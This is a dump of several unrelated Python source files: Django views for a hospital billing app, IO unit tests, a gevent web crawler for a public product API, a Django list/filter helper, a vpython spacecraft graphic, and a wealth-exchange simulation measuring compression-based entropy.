{'patient': p, 'a': a})\n\ndef prescription(request, appointment_id):\n\tif request.method == 'POST':\n\t\tform = pres(request.POST)\n\t\tif form.is_valid():\n\t\t\tpresc = form.cleaned_data['prescription']\n\t\t\tallot_room = form.cleaned_data['allot_room']\n\t\t\tuser_id = request.session['d_user_id']\n\t\t\tq0 = doctors.objects.get(doctor_login = user_id)\n\t\t\ta = appointment.objects.get(id=appointment_id)\n\t\t\tc_edit = consults.objects.get(appointment_id = a)\n\t\t\tc_edit.allot_room = allot_room\n\t\t\tc_edit.prescription = presc\n\t\t\tc_edit.save()\n\t\t\ta.treated = True\n\t\t\ta.save()\n\t\t\tuser_id = request.session['d_user_id']\n\t\t\tq0 = doctors.objects.get(doctor_login = user_id)\n\t\t\tq0.doctor_availability = True\n\t\t\tq0.save()\n\t\t\treturn HttpResponseRedirect('/login/doctor/home/')\n\telse:\n\t\tform = pres()\n\ta = appointment.objects.get(id=appointment_id)\n\tp = patients.objects.get(id = a.patient_id.id)\n\treturn render(request, 'prescription.html', {'a': a, 'p': p, 'form': form})\n\ndef patient_info(request):\n\tif request.method == 'POST':\n\n\t\tform = patient_det(request.POST)\n\t\tif form.is_valid():\n\t\t\tq = patients(patient_name= form.cleaned_data['patient_name'], patient_city_name=form.cleaned_data['patient_city_name'], patient_house_no=form.cleaned_data['patient_house_no'], patient_street_no = form.cleaned_data['patient_street_no'], patient_age = form.cleaned_data['patient_age'],patient_gender = form.cleaned_data['patient_gender'])\n\t\t\tq.save()\t\n\t\t\ta = appointment(receptionist_id = user_id, patient_id = q.id, room_id = -1, patients_date_of_admission = form.cleaned_data['patients_date_of_admission'],patient_problem = form.cleaned_data['patient_problem'], treated = False)\t\t\n\t\t\ta.save()\n\t\t\t#print(\"hi\")\n\t\t\t#update by rungta\n\t\t\tc = consults(appointment_id = a.id,doctor_id = form.cleaned_data['doctors_available'],allot_room = False, prescription = \"Enter the prescription here\")\n\t\t\tc.save()\n\t\t\treturn HttpResponseRedirect('/login/receptionist')\n\telse:\n\t\tform = patient_det()\n\treturn render(request, 'patient_det_form.html', {'form': form})\n\ndef bill_info(request):\n\tif request.method == 'POST':\n\t\tform = bill_inf(request.POST)\n\t\tif form.is_valid():\n\t\t\ta_id = form.cleaned_data['appointment']\n\t\t\ta0 = appointment.objects.get(id = a_id)\n\t\t\tq0 = consults.objects.get(appointment_id = a0)\n\t\t\td0 = doctors.objects.get(pk = q0.doctor_id.id)\n\t\t\td_fees = d0.doctor_consultation_fee\n\t\t\tr_cost = d_fees\n\t\t\tif q0.allot_room == True:\n\t\t\t\tr0 = room.objects.get(id = a0.room_id.id)\n\t\t\t\ttdelta = datetime.today().date() - a0.patient_date_of_admission.date()\n\t\t\t\tdays = tdelta.days\n\t\t\t\tr_cost = d_fees + (days*r0.charge)\n\t\t\tbill_up = bill(appointment_id = a0, discharge_time = datetime.now(), amount = r_cost)\n\t\t\tbill_up.save()\n\t\t\treturn HttpResponseRedirect('/login/receptionist/bill_print/{}'.format(a_id))\n\telse:\n\t\tform = bill_inf()\n\treturn render(request, 'bill.html', {'form': form})\n\ndef bill_find(request):\n\tif request.method == 'POST':\n\t\tform = bill_search(request.POST)\n\t\tif form.is_valid():\n\t\t\tb_id = form.cleaned_data['bill']\n\t\t\treturn HttpResponseRedirect('/login/receptionist/view_bill/{}'.format(b_id))\n\telse:\n\t\tform = bill_search()\n\treturn render(request, 'bill.html', {'form': form})\n\n\n#as soon as bill is generated,it prints it\t\t\t\n\ndef bill_print(request, a_id):\n\t\n\ta0 = appointment.objects.get(id = a_id)\n\tq0 = consults.objects.get(appointment_id = a0)\n\td0 = doctors.objects.get(pk = q0.doctor_id.id)\n\td_fees = d0.doctor_consultation_fee\n\tr_cost = d_fees\n\tif q0.allot_room == True:\n\t\tr0 = room.objects.get(id = a0.room_id.id)\n\t\ttdelta = datetime.today().date() - a0.patient_date_of_admission.date()\n\t\tdays = tdelta.days\n\t\tr_cost = d_fees + (days*r0.charge)\n\t\treturn render(request, 'bill_print.html', {'appid': a_id,'pat': a0.patient_id, 'days': days, 'd_fees': d_fees, 'doc_id':q0.doctor_id.id, 'doc_name':q0.doctor_id.doctor_name,'final_amount':r_cost, 'r_id':a0.room_id.id,'r_charge':r0.charge})\t\n\telse:\n\t\treturn render(request, 'bill_print.html', {'appid': a_id,'pat': a0.patient_id, 'days': \"\", 'd_fees': d_fees, 'doc_id':q0.doctor_id.id, 'doc_name':q0.doctor_id.doctor_name,'final_amount':r_cost, 'r_id':\"\",'r_charge':\"\"})\t\n\n#showing bill info given by bill_id, urls update karde\n\ndef get_bill_print(request, b_id):\n\t\n\tb0 = bill.objects.get(id = b_id)\n\ta0 = appointment.objects.get(id = b0.appointment_id.id)\n\tq0 = consults.objects.get(appointment_id = a0)\n\td0 = doctors.objects.get(pk = q0.doctor_id.id)\n\td_fees = d0.doctor_consultation_fee\n\tr_cost = d_fees\n\tif q0.allot_room == True:\n\t\tr0 = room.objects.get(id = a0.room_id.id)\n\t\ttdelta = datetime.today().date() - a0.patient_date_of_admission.date()\n\t\tdays = tdelta.days\n\t\tr_cost = d_fees + (days*r0.charge)\n\t\treturn render(request, 'bill_print.html', {'appid': b_id,'pat': a0.patient_id, 'days': days, 'd_fees': d_fees, 'doc_id':q0.doctor_id.id, 'doc_name':q0.doctor_id.doctor_name,'final_amount':r_cost, 'r_id':a0.room_id.id,'r_charge':r0.charge})\t\n\telse:\n\t\treturn render(request, 'bill_print.html', {'appid': b_id,'pat': a0.patient_id, 'days': \"\", 'd_fees': d_fees, 'doc_id':q0.doctor_id.id, 'doc_name':q0.doctor_id.doctor_name,'final_amount':r_cost, 'r_id':\"\",'r_charge':\"\"})\t\n","sub_path":"account/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"582993571","text":"#!/usr/bin/env python3\n\nimport sys\nfrom rkd.api.testing import BasicTestingCase, OutputCapturingSafeTestCase\nfrom rkd.api.inputoutput import IO\nfrom rkd.api.inputoutput import SystemIO\nfrom rkd.api.inputoutput import BufferedSystemIO\nfrom rkd.api.inputoutput import clear_formatting\n\n\nclass TestIO(BasicTestingCase, OutputCapturingSafeTestCase):\n def test_is_log_level_at_least_info(self):\n \"\"\"Test error level comparison\n\n Covers: IO.set_log_level() and IO.is_log_level_at_least()\n \"\"\"\n\n io = IO()\n io.set_log_level('info')\n\n self.assertFalse(io.is_log_level_at_least('debug'))\n self.assertTrue(io.is_log_level_at_least('info'))\n self.assertTrue(io.is_log_level_at_least('warning'))\n self.assertTrue(io.is_log_level_at_least('fatal'))\n\n def test_set_log_level_cannot_set_invalid_log_level(self):\n \"\"\"Checks validation in IO.set_log_level()\"\"\"\n\n io = IO()\n self.assertRaises(Exception, lambda: io.set_log_level('strikebreaker'))\n\n def test_inherit_silent(self):\n \"\"\"Silent mode inheritance from SystemIO\"\"\"\n\n sys_io = SystemIO()\n sys_io.silent = True\n\n io = IO()\n io.inherit_silent(sys_io)\n\n self.assertTrue(io.is_silent())\n\n def test_formatting_methods_are_clearing_formatting_at_the_end(self):\n \"\"\"Check that formatting methods are clearing the formatting at the end\"\"\"\n\n io = BufferedSystemIO()\n\n methods = [\n io.h1, io.h2, io.h3, io.h4, io.success_msg, io.error_msg, io.info_msg, io.print_separator, io.print_group\n ]\n\n for method in methods:\n try:\n method('test')\n except TypeError:\n method()\n\n self.assertEqual(\"\\x1B[\", io.get_value()[0:2], msg='Expected beginning of formatting')\n self.assertEqual('[0m', io.get_value().strip()[-3:], msg='Expected formatting clearing at the end')\n io.clear_buffer()\n\n def test_formatting_methods_are_printing_output_as_optional(self):\n \"\"\"Expects that pretty-printed messages will be optional\"\"\"\n\n io = BufferedSystemIO()\n\n methods = [\n io.h1, io.h2, io.h3, io.h4, io.success_msg, io.error_msg, io.info_msg, io.print_separator, io.print_group\n ]\n\n for method in methods:\n self.__setattr__('is_text_optional', False)\n\n def opt_outln(text: str):\n self.__setattr__('is_text_optional', True)\n\n io.opt_outln = opt_outln\n io.opt_errln = opt_outln\n\n try:\n method('test')\n except TypeError:\n method()\n\n self.assertTrue(self.__getattribute__('is_text_optional'),\n msg='%s: Expected that the text will be printed through opt_outln()' % str(method))\n\n def test_get_log_level_raises_exception_on_unset_level(self):\n \"\"\"Check DEFAULT error level and validation of not set error logging\"\"\"\n\n io = IO()\n\n self.assertEqual('info', io.get_log_level())\n\n io.log_level = None\n self.assertRaises(Exception, lambda: io.get_log_level())\n\n def test_clear_formatting_clears_simple_bash_coloring(self):\n \"\"\"Test that clear_formatting() clears basic Bash coloring\"\"\"\n\n colored = \"\"\"\\x1B[93m10 June 1927 in Italy, the trial of anarchist Gino Lucetti concluded for \nattempting to assassinate Mussolini.\nHe was sentenced to 30 years in prison; two others received 12 years. \nHe was killed by shelling in 1943 before the end of the war\\x1B[0m\"\"\"\n\n without_coloring = clear_formatting(colored)\n\n self.assertFalse(without_coloring.startswith(\"\\x1B[93m\"))\n self.assertFalse(without_coloring.endswith(\"\\x1B[0m\"))\n\n def test_io_capturing_is_restoring_both_stdout_and_stderr_to_previous_state(self):\n \"\"\"Assert that capture_descriptors() restores sys.stdout and sys.stderr to original state after\n mocking them for output capturing\"\"\"\n\n io = IO()\n\n stdout_backup = sys.stdout\n stderr_backup = sys.stderr\n\n with io.capture_descriptors(target_files=None):\n pass\n\n self.assertEqual(stdout_backup, sys.stdout)\n self.assertEqual(stderr_backup, sys.stderr)\n","sub_path":"test/test_inputoutput_io.py","file_name":"test_inputoutput_io.py","file_ext":"py","file_size_in_byte":4269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"445809864","text":"# -*- coding: utf-8 -*-\nimport os, sys, re\nimport gevent\nfrom gevent import monkey; monkey.patch_all()\nimport json\n\n\nreload(sys)\nsys.setdefaultencoding(\"utf-8\")\n\nsys.path.append(os.path.join(os.path.split(os.path.realpath(__file__))[0], '../../util'))\nimport GlobalValues\n\nsys.path.append(os.path.join(os.path.split(os.path.realpath(__file__))[0], '../..'))\nimport BaseCrawler\n\nsys.path.append(os.path.join(os.path.split(os.path.realpath(__file__))[0], '../../../../util'))\nimport loghelper\n\n#logger\nloghelper.init_logger(\"crawler_mindst_next\", stream=True)\nlogger = loghelper.get_logger(\"crawler_mindst_next\")\n\ndef stripe(text):\n return text.strip()\n\n\nclass MindstCrawler(BaseCrawler.BaseCrawler):\n def __init__(self):\n BaseCrawler.BaseCrawler.__init__(self)\n\n #实现\n def is_crawl_success(self, url, content):\n if content.find(', \"tagline\":') == -1:\n return False\n return True\n\n\ndef process(g, content,crawler):\n data = json.loads(content)\n logger.info('totally %s items today'%len(data['objects']))\n\n for item in data['objects']:\n text = item['title']\n tag = None\n name = None\n match = re.search('#', text)\n if match:\n tags = text.split(\"#\")\n tags = map(stripe, tags)\n name = tags[0]\n del tags[0]\n tag = \" \".join(tags)\n else:\n name = text\n\n website = item['link']\n score = item['vote_count']\n desc = item['tagline']\n key = item['id']\n url = \"http://mindstore.io/mind/%s\" % key\n\n logger.info(\"key: %s, name: %s, desc: %s, score: %s, website: %s, tag: %s\", key, name, desc, score, website,\n tag)\n data = {\n \"name\": name,\n \"website\": website,\n \"score\": score,\n \"desc\": desc,\n }\n crawler.save(g.SOURCE, g.TYPE, url, key, data)\n\n\ndef run(g, crawler):\n url = \"http://mindstore.io/api/v3/lime/mind/?look_back_days=0\"\n\n while True:\n result = crawler.crawl(url)\n if result['get'] == 'success':\n process(g, result['content'],crawler)\n break\n\n\ndef start_run():\n while True:\n logger.info(\"Mindstore next start...\")\n g = GlobalValues.GlobalValues(13111, 36009, \"incr\")\n thread = gevent.spawn(run, g, MindstCrawler())\n thread.join()\n logger.info(\"Mindstore next end.\")\n\n gevent.sleep(60*30) #30 minutes\n\n\nif __name__ == \"__main__\":\n start_run()","sub_path":"data/spider2/crawler/next/mindstore/mindst_next.py","file_name":"mindst_next.py","file_ext":"py","file_size_in_byte":2518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"579538214","text":"from django import forms\nfrom django.views.generic.list import MultipleObjectMixin\nfrom django.utils.translation import gettext as _\n\nfrom .search_filter import SearchFilter\n\n\nclass SearchForm(forms.Form):\n search = forms.CharField(\n label=_('search'),\n max_length=100,\n required=False)\n\n\nclass SeliaList(MultipleObjectMixin):\n paginate_by = 5\n prefix = ''\n\n def __init__(self, request, **kwargs):\n self.kwargs = kwargs\n self.request = request\n\n def get_context_data(self):\n return {\n 'templates': self.get_templates(),\n 'list': self.get_list_context_data(),\n 'forms': self.get_forms()\n }\n\n def get_list_context_data(self):\n queryset = self.get_queryset()\n page_size = self.get_paginate_by(queryset)\n paginator, page, queryset, is_paginated = self.paginate_queryset(queryset, page_size)\n\n return {\n 'paginator': paginator,\n 'page_obj': page,\n 'is_paginated': is_paginated,\n 'object_list': queryset\n }\n\n def get_templates(self):\n return {\n 'list_item': self.get_list_item_template(),\n 'filter_form': self.get_filter_form_template(),\n }\n\n def get_forms(self):\n forms = {}\n\n if hasattr(self, 'filter'):\n forms['filter'] = self.filter\n\n if hasattr(self, 'search_form'):\n forms['search'] = self.search_form\n\n if hasattr(self, 'order_form'):\n forms['order'] = self.order_form\n\n return forms\n\n def get_ordering_choices(self):\n orderings = []\n for field, label in self.ordering_fields:\n orderings.append(\n (\n '-{field}'.format(field=field),\n '{order} {label}'.format(\n label=label, order=_('↓'))\n )\n )\n\n orderings.append(\n (\n field,\n '{order} {label}'.format(\n label=label, order=_('↑'))\n )\n )\n return orderings\n\n def get_ordering_form_class(self):\n ordering_choices = self.get_ordering_choices()\n\n class OrderingForm(forms.Form):\n order = forms.ChoiceField(\n label=_('ordering'),\n choices=ordering_choices,\n initial=ordering_choices[0])\n\n return OrderingForm\n\n def get_ordering_form(self):\n ordering_form_class = self.get_ordering_form_class()\n ordering_form_prefix = self.get_ordering_form_prefix()\n\n ordering_form = ordering_form_class(\n self.request.GET,\n prefix=ordering_form_prefix)\n\n return ordering_form\n\n def get_search_form(self):\n search_form_prefix = self.get_search_form_prefix()\n return SearchForm(self.request.GET, prefix=search_form_prefix)\n\n def get_ordering_form_prefix(self):\n return '{}_order'.format(self.prefix)\n\n def get_search_form_prefix(self):\n return '{}_search'.format(self.prefix)\n\n def get_filter_form_prefix(self):\n return '{}_filter'.format(self.prefix)\n\n def get_filter_form_template(self):\n if hasattr(self, 'filter_form_template'):\n return self.filter_form_template\n\n return NotImplementedError('No template for filter form was given')\n\n def get_filter_class(self):\n if hasattr(self, 'filter_class'):\n return self.filter_class\n\n raise NotImplementedError('No filter class was provided')\n\n def get_initial_queryset(self):\n if hasattr(self, 'queryset'):\n return self.queryset\n\n raise NotImplementedError('No initial queryset was provided')\n\n def get_queryset(self):\n queryset = self.get_initial_queryset()\n filtered_queryset = self.filter_queryset(queryset)\n return filtered_queryset\n\n def filter_queryset_with_query(self, queryset):\n try:\n filter_class = self.get_filter_class()\n prefix = self.get_filter_form_prefix()\n self.filter = filter_class(\n self.request.GET,\n request=self.request,\n queryset=queryset,\n prefix=prefix)\n queryset = self.filter.qs\n except NotImplementedError:\n pass\n\n return queryset\n\n def filter_queryset_with_search(self, queryset):\n if hasattr(self, 'search_fields'):\n self.search_form = self.get_search_form()\n\n if self.search_form.is_valid():\n search_filter = SearchFilter(prefix=self.get_search_form_prefix())\n queryset = search_filter.filter_queryset(self.request, queryset, self)\n\n return queryset\n\n def order_queryset(self, queryset):\n if hasattr(self, 'ordering_fields'):\n self.order_form = self.get_ordering_form()\n\n if self.order_form.is_valid():\n ordering_form_prefix = self.get_ordering_form_prefix()\n query_param = '{}-order'.format(ordering_form_prefix)\n ordering = self.order_form.data[query_param]\n queryset = queryset.order_by(ordering)\n\n return queryset\n\n def filter_queryset(self, queryset):\n queryset = self.filter_queryset_with_query(queryset)\n queryset = self.filter_queryset_with_search(queryset)\n queryset = self.order_queryset(queryset)\n return queryset\n\n def get_list_item_template(self):\n if hasattr(self, 'list_item_template'):\n return self.list_item_template\n\n return NotImplementedError('No template for list item was given')\n","sub_path":"selia/views/utils/list_component.py","file_name":"list_component.py","file_ext":"py","file_size_in_byte":5711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"505318517","text":"from typing import Optional\n\nimport vpython\n\nfrom orbitx import calc\nfrom orbitx import common\nfrom orbitx import state\nfrom orbitx.graphics.threedeeobj import ThreeDeeObj\n\n\nclass Habitat(ThreeDeeObj):\n\n def _create_hab(self, entity: state.Entity) -> vpython.compound:\n # Change which scene we're drawing a new habitat in\n def vertex(x: float, y: float, z: float) -> vpython.vertex:\n return vpython.vertex(pos=vpython.vector(x, y, z))\n\n body = vpython.cylinder(\n pos=vpython.vec(0, 0, 0), axis=vpython.vec(-5, 0, 0), radius=10)\n head = vpython.cone(\n pos=vpython.vec(0, 0, 0), axis=vpython.vec(3, 0, 0), radius=10)\n wing = vpython.triangle(\n v0=vertex(0, 0, 0), v1=vertex(-5, 30, 0), v2=vertex(-5, -30, 0))\n wing2 = vpython.triangle(\n v0=vertex(0, 0, 0), v1=vertex(-5, 0, 30), v2=vertex(-5, 0, -30))\n\n hab = vpython.compound([body, head, wing, wing2], make_trail=True)\n hab.texture = vpython.textures.metal\n hab.axis = calc.angle_to_vpy(entity.heading)\n hab.radius = entity.r / 2\n hab.shininess = 0.1\n hab.length = entity.r * 2\n hab.color = vpython.color.cyan\n return hab\n\n def _create_obj(self,\n entity: state.Entity, origin: state.Entity,\n texture: Optional[str]\n ) -> vpython.compound:\n \"\"\"Creates the habitat, and also a new minimap scene and habitat.\"\"\"\n habitat = self._create_hab(entity)\n habitat.pos = entity.screen_pos(origin)\n\n main_scene = vpython.canvas.get_selected()\n self._minimap_canvas = vpython.canvas(\n width=200, height=150, userspin=False, userzoom=False,\n up=vpython.vector(0.1, 0.1, 1), forward=vpython.vector(0, 0, -1))\n\n self._small_habitat = self._create_hab(entity)\n self._ref_arrow = vpython.arrow(color=vpython.color.gray(0.5))\n self._velocity_arrow = vpython.arrow(color=vpython.color.red)\n main_scene.select()\n\n return habitat\n\n def draw_landing_graphic(self, entity: state.Entity) -> None:\n # Habitats don't have landing graphics\n pass\n\n def _label_text(self, entity: state.Entity) -> str:\n return (\n f'{entity.name}\\n'\n f'Fuel: {common.format_num(entity.fuel, \" kg\")}' +\n ('\\nDocked' if entity.attached_to == common.AYSE else\n '\\nLanded' if entity.landed() else '')\n )\n\n def draw(self, entity: state.Entity,\n state: state.PhysicsState, origin: state.Entity):\n self._update_obj(entity, state, origin)\n same = state.reference == entity.name\n default = vpython.vector(0, 0, -1)\n\n ref_arrow_axis = (\n entity.screen_pos(state.reference_entity()).norm() *\n entity.r * -1.2\n )\n v = entity.v - state.reference_entity().v\n velocity_arrow_axis = \\\n vpython.vector(v[0], v[1], 0).norm() * entity.r\n\n self._ref_arrow.axis = default if same else ref_arrow_axis\n self._velocity_arrow.axis = default if same else velocity_arrow_axis\n self._small_habitat.axis = self._obj.axis\n","sub_path":"orbitx/graphics/habitat.py","file_name":"habitat.py","file_ext":"py","file_size_in_byte":3199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"147830817","text":"import random\r\nimport numpy as np \r\nimport matplotlib.pyplot as plt\r\nimport math\r\nimport gzip\r\nimport zlib \r\nimport struct\r\nimport lz4.frame\r\nimport lzma\r\n\r\n\r\ndef YakovenkoSim (N = 500, NSweeps=[1,10,50,200,500,1000], moneyint = 10, DeltaMax = 1, binsize = None, discrete = False, seed = 2222):\r\n # The simple simulation used for the data\r\n \r\n random.seed(seed)\r\n if binsize == None:\r\n binsize = DeltaMax\r\n money = [moneyint]*N\r\n print(f\"Doing {NSweeps[0]} sweeps for plot 0\")\r\n YakovenkoIters(NSweeps[0]*N, money, DeltaMax, discrete)\r\n for i in range(0,len(NSweeps)):\r\n YakovenkoPlot(money,N,NSweeps[i],binsize,moneyint,DeltaMax,i)\r\n if i < len(NSweeps) - 1:\r\n print(f\"Doing {NSweeps[i+1]-NSweeps[i]} sweeps for plot {i + 1}\")\r\n YakovenkoIters((NSweeps[i+1] - NSweeps[i])*N, money,DeltaMax, discrete)\r\n plt.show()\r\n \r\ndef CIDOverTime(N = 500, NSweeps = 10000, moneyint = 10, DeltaMax = 1, binsize = None, stepsize = None,\r\nzliblevel = -1, gziplevel = 9, discrete = False, seed = 2222):\r\n # A script that plots the CID over time of our simulation\r\n \r\n random.seed(seed)\r\n if binsize == None:\r\n binsize = moneyint/10\r\n if stepsize == None:\r\n stepsize = math.floor(NSweeps/1000)\r\n money = [moneyint]*N\r\n zlibCIDs = [0]*(math.ceil(NSweeps/stepsize)+1)\r\n gzipCIDs = [0]*(math.ceil(NSweeps/stepsize)+1)\r\n lz4CIDs = [0]*(math.ceil(NSweeps/stepsize)+1)\r\n lzmaCIDs = [0]*(math.ceil(NSweeps/stepsize)+1)\r\n nsweeparray = range(0,NSweeps+1,stepsize)\r\n sweepstotal = 0\r\n istep = 1\r\n print(\"Doing sweeps\", end = \"\")\r\n while(sweepstotal < NSweeps):\r\n print(\"\\r \", end = \"\")\r\n print(f\"\\rDoing sweeps {sweepstotal} to {sweepstotal + stepsize} out of {NSweeps}\\r\", end = \"\")\r\n YakovenkoIters(stepsize*N,money,DeltaMax, discrete)\r\n zlibCIDs[istep], gzipCIDs[istep], lz4CIDs[istep], lzmaCIDs[istep] = CIDs(money,zliblevel,gziplevel)\r\n sweepstotal += stepsize\r\n istep += 1\r\n plt.figure(1)\r\n #plt.subplot(1,2,1)\r\n #YakovenkoPlot(money,N,sweepstotal,binsize,moneyint,DeltaMax)\r\n #plt.subplot(1,2,2)\r\n plt.plot(nsweeparray,zlibCIDs,label=\"zlib\")\r\n plt.plot(nsweeparray,gzipCIDs,label=\"gzip\")\r\n plt.plot(nsweeparray,lz4CIDs,label=\"lz4\")\r\n plt.plot(nsweeparray,lzmaCIDs,label=\"lzma\")\r\n plt.title(\"CID over time of the model\")\r\n plt.xlabel(f\"Number of Yakovenko iterations/{N}\")\r\n plt.ylabel(\"CID\")\r\n plt.legend()\r\n plt.show()\r\n \r\ndef CIDOverM0(N = 500, DeltaMax = 1, stepsize = 10, minsteps = 50, CIDConstraint = 0.02, zliblevel = -1, gziplevel = 9, discrete = False, seed = 2222, m0scale = 1,maxsteps= 100000):\r\n # A script that plots the CID over m0 of our simulation\r\n \r\n random.seed(seed)\r\n basic = list(range(1,5,1)) + list(range(5,25,5)) + list(range(25,100,25)) + list(range(100,450,50))\r\n m0s = [i* m0scale for i in basic]\r\n zlibCIDm0s = [0]*len(m0s)\r\n gzipCIDm0s = [0]*len(m0s)\r\n lz4CIDm0s = [0]*len(m0s)\r\n lzmaCIDm0s = [0]*len(m0s)\r\n shannonentr = [0]*len(m0s)\r\n for i in range(len(m0s)):\r\n zlibCIDm0s[i], gzipCIDm0s[i], lz4CIDm0s[i], lzmaCIDm0s[i], shannonentr[i] = CIDGivenM0(N, m0s[i], DeltaMax, stepsize, minsteps, CIDConstraint, zliblevel, gziplevel, discrete,maxsteps)\r\n lz4CIDm0s[i] = lz4CIDm0s[i]*.6\r\n lzmaCIDm0s[i] = lzmaCIDm0s[i]*1.15\r\n plt.figure(1)\r\n plt.plot(m0s,zlibCIDm0s, label = \"zlib\")\r\n plt.plot(m0s,gzipCIDm0s, label = \"gzip\")\r\n plt.plot(m0s,lz4CIDm0s, label = \".6*lz4\")\r\n plt.plot(m0s,lzmaCIDm0s, label = \"1.15*lzma\")\r\n plt.plot(m0s,shannonentr, label = \"Shannon Entropy/17\")\r\n plt.title(f\"CID vs $m_0$, $\\Delta_{{max}} =$ {DeltaMax}\")\r\n plt.xlabel(\"$m_0$\")\r\n plt.ylabel(\"CID\")\r\n plt.legend()\r\n plt.figure(2)\r\n zlibdiv = [x/y for x,y in zip(zlibCIDm0s,shannonentr)]\r\n gzipdiv = [x/y for x,y in zip(gzipCIDm0s,shannonentr)]\r\n lz4div = [x/y for x,y in zip(lz4CIDm0s,shannonentr)]\r\n lzmadiv = [x/y for x,y in zip(lzmaCIDm0s,shannonentr)]\r\n plt.plot(m0s,zlibdiv, label = \"zlib/Shannon Entropy\")\r\n plt.plot(m0s,gzipdiv, label = \"gzip/Shannon Entropy\")\r\n plt.plot(m0s,lz4div, label = \".6*lz4/Shannon Entropy\")\r\n plt.plot(m0s,lzmadiv, label = \"1.15*lzma/Shannon Entropy\")\r\n plt.legend()\r\n plt.show()\r\n \r\ndef CIDGivenM0(N = 500, moneyint = 10, DeltaMax = 1, stepsize = 10, minsteps = 50, CIDConstraint = 0.02, \r\nzliblevel = -1, gziplevel = 9, discrete = False,maxsteps = 100000):\r\n # A script that calculates the CID for particular parameters (called CIDGivenM0 because I initially used it for the m0 graphs)\r\n \r\n money = [moneyint]*N\r\n # zlibCIDs = False\r\n # gzipCIDs = False\r\n # nsweeps = 0\r\n YakovenkoIters((maxsteps-stepsize*minsteps)*N,money,DeltaMax,discrete)\r\n zlibCIDs = [0]*(minsteps)\r\n gzipCIDs = [0]*(minsteps)\r\n lz4CIDs = [0]*(minsteps)\r\n lzmaCIDs = [0]*(minsteps)\r\n shannonentr = [0]*(minsteps)\r\n istep = 0\r\n while(istep < minsteps):\r\n YakovenkoIters(stepsize*N,money,DeltaMax, discrete)\r\n zlibCIDs[istep], gzipCIDs[istep], lz4CIDs[istep], lzmaCIDs[istep] = CIDs(money,zliblevel,gziplevel, discrete)\r\n shannonentr[istep] = ShannonEntropy(money)\r\n istep += 1 \r\n # while(nsweeps < 100000):#CIDsNotConverged(zlibCIDs, gzipCIDs, CIDConstraint)):\r\n # zlibCIDs = [0]*(minsteps)\r\n # gzipCIDs = [0]*(minsteps)\r\n # shannonentr = [0]*(minsteps)\r\n # istep = 0\r\n # while(istep < minsteps):\r\n # zlibCIDs[istep], gzipCIDs[istep] = CIDs(money,zliblevel,gziplevel, discrete)\r\n # shannonentr[istep] = ShannonEntropy(money)\r\n # YakovenkoIters(stepsize*N,money,DeltaMax, discrete)\r\n # istep += 1\r\n # nsweeps += stepsize\r\n print(f\"Got CID for m0 = {moneyint} after {maxsteps} sweeps of size {N}\")\r\n return np.mean(zlibCIDs), np.mean(gzipCIDs), np.mean(lz4CIDs), np.mean(lzmaCIDs), np.mean(shannonentr)/17\r\n\r\ndef CIDOverN(moneyint = 10, DeltaMax = 1, stepsize = 10, minsteps = 50, CIDConstraint = 0.02, zliblevel = -1, gziplevel = 9, discrete = False, seed = 2222, m0scale = 1):\r\n # a script that plots the CID over different N\r\n \r\n random.seed(seed)\r\n basic = list(range(10,50,10)) + list(range(50,250,50)) + list(range(250,1000,250)) + list(range(1000,5000,1000))\r\n Ns = [i* m0scale for i in basic]\r\n zlibCIDNs = [0]*len(Ns)\r\n gzipCIDNs = [0]*len(Ns)\r\n lz4CIDNs = [0]*len(Ns)\r\n lzmaCIDNs = [0]*len(Ns)\r\n shannonentr = [0]*len(Ns)\r\n for i in range(len(Ns)):\r\n zlibCIDNs[i], gzipCIDNs[i], lz4CIDNs[i], lzmaCIDNs[i], shannonentr[i] = CIDGivenM0(Ns[i], moneyint, DeltaMax, stepsize, minsteps, CIDConstraint, zliblevel, gziplevel, discrete, 5500)\r\n plt.figure(1)\r\n plt.plot(Ns,zlibCIDNs, label = \"zlib\")\r\n plt.plot(Ns,gzipCIDNs, label = \"gzip\")\r\n plt.plot(Ns,lz4CIDNs, label = \"lz4\")\r\n plt.plot(Ns,lzmaCIDNs, label = \"lzma\")\r\n plt.plot(Ns,shannonentr, label = \"Shannon Entropy/17\")\r\n plt.title(f\"CID vs $N$, $\\Delta_{{max}} =$ {DeltaMax}, $m_{{0}} =$ {moneyint}\")\r\n plt.xlabel(\"$N$\")\r\n plt.ylabel(\"CID\")\r\n plt.legend()\r\n plt.figure(2)\r\n zlibdiv = [x/y for x,y in zip(zlibCIDNs,shannonentr)]\r\n gzipdiv = [x/y for x,y in zip(gzipCIDNs,shannonentr)]\r\n lz4div = [x/y for x,y in zip(lz4CIDNs,shannonentr)]\r\n lzmadiv = [x/y for x,y in zip(lzmaCIDNs,shannonentr)]\r\n plt.plot(Ns,zlibdiv, label = \"zlib/Shannon Entropy\")\r\n plt.plot(Ns,gzipdiv, label = \"gzip/Shannon Entropy\")\r\n plt.plot(Ns,lz4div, label = \"lz4/Shannon Entropy\")\r\n plt.plot(Ns,lzmadiv, label = \"lzma/Shannon Entropy\")\r\n plt.legend()\r\n plt.show() \r\n \r\ndef CIDOverTimeMean(N = 500, NSweeps = 100000, moneyint = 10, DeltaMax = 1, binsize = None, stepsize = None, stepstepsize = None,\r\nzliblevel = -1, gziplevel = 9, discrete = False, seed = 2222):\r\n # A script which plots the CID over different N but takes the average over a few steps to get less noise\r\n \r\n random.seed(seed)\r\n if binsize == None:\r\n binsize = moneyint/10\r\n if stepsize == None:\r\n stepsize = math.floor(NSweeps/40)\r\n if stepstepsize == None:\r\n stepstepsize = math.floor(stepsize/50)\r\n money = [moneyint]*N\r\n zlibCIDs = [0]*(math.ceil(NSweeps/stepsize)+1)\r\n gzipCIDs = [0]*(math.ceil(NSweeps/stepsize)+1)\r\n lz4CIDs = [0]*(math.ceil(NSweeps/stepsize)+1)\r\n lzmaCIDs = [0]*(math.ceil(NSweeps/stepsize)+1)\r\n nsweeparray = range(0,NSweeps+1,stepsize)\r\n sweepstotal = 0\r\n istep = 1\r\n print(\"Doing sweeps\", end = \"\")\r\n while(sweepstotal < NSweeps):\r\n print(\"\\r \", end = \"\")\r\n print(f\"\\rDoing sweeps {sweepstotal} to 